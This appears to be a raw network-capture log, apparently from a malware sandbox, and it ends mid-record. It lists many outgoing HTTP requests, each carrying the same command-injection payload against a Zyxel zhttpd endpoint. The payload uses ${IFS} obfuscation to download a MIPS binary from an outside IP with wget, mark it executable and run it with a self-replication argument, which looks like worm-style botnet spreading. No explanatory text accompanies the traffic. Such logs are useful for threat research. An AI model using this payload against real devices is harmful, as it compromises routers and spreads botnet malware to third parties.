                                      Jan 19, 2024 17:29:39.912432909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6135192.168.2.145425242.162.73.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912466049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6136192.168.2.1444864147.72.62.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912508965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6137192.168.2.1438570125.87.210.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912535906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6138192.168.2.1458362126.131.71.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912580967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6139192.168.2.145438870.255.122.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912615061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6140192.168.2.1448926106.14.79.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912652969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6141192.168.2.144533260.196.111.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912677050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6142192.168.2.1444242168.121.223.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912730932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6143192.168.2.145017831.4.185.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912779093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6144192.168.2.145687846.114.175.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912801027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6145192.168.2.14534584.214.16.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912833929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6146192.168.2.145441432.161.55.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912870884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6147192.168.2.1437020106.119.32.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912905931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6148192.168.2.145780835.1.122.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.912959099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6149192.168.2.145800235.38.107.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913007975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6150192.168.2.1453162199.126.95.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913055897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6151192.168.2.1438388204.253.192.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913100004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6152192.168.2.144013271.145.160.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913135052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6153192.168.2.1435796140.155.188.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913172007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6154192.168.2.145007658.87.200.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913193941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6155192.168.2.1452458207.136.39.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913218021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6156192.168.2.1441392142.240.86.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913271904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6157192.168.2.145648460.62.102.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913310051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6158192.168.2.1452222160.172.192.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913348913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6159192.168.2.1446800145.81.19.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913381100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6160192.168.2.144799017.132.83.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913441896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6161192.168.2.145030635.138.47.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913458109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6162192.168.2.145443859.34.25.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913500071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6163192.168.2.1454914121.43.81.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913521051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6164192.168.2.1438452196.34.191.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913551092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6165192.168.2.145723474.30.7.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913599968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6166192.168.2.1448176107.158.217.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913664103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6167192.168.2.1439534158.80.65.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913719893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6168192.168.2.1447874152.57.122.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913765907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6169192.168.2.1441128125.158.55.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913804054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6170192.168.2.1449782173.241.31.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913844109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6171192.168.2.1434860178.172.179.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913865089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6172192.168.2.1452292183.68.106.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913912058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6173192.168.2.1455662168.136.172.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913949013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6174192.168.2.145883092.90.152.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.913995028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6175192.168.2.1458090114.105.45.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914048910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6176192.168.2.144234224.62.63.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914069891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6177192.168.2.143482017.220.151.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914125919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6178192.168.2.1453338205.149.68.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914175034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6179192.168.2.145278613.1.8.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914225101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6180192.168.2.1454988176.21.51.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914251089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6181192.168.2.1458658157.72.207.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914304972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6182192.168.2.145768080.112.55.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914344072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6183192.168.2.1437590115.127.207.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914380074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6184192.168.2.144030690.218.90.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914412022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6185192.168.2.1433658203.216.73.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914448977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6186192.168.2.1441924176.35.212.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914514065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6187192.168.2.144246850.45.67.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914563894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6188192.168.2.1434942151.231.238.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914604902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6189192.168.2.1456672104.132.0.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914644957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6190192.168.2.1443670191.32.178.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914679050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6191192.168.2.1433424150.237.209.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914714098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6192192.168.2.145684867.190.225.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914752960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6193192.168.2.145190820.34.12.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914803028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6194192.168.2.144567432.230.178.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914849997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6195192.168.2.1435574126.183.16.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914870024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6196192.168.2.1437846102.174.141.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914900064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6197192.168.2.1457912147.8.214.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.914963007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6198192.168.2.1444322106.195.229.79443
                                      TimestampBytes transferredDirectionData
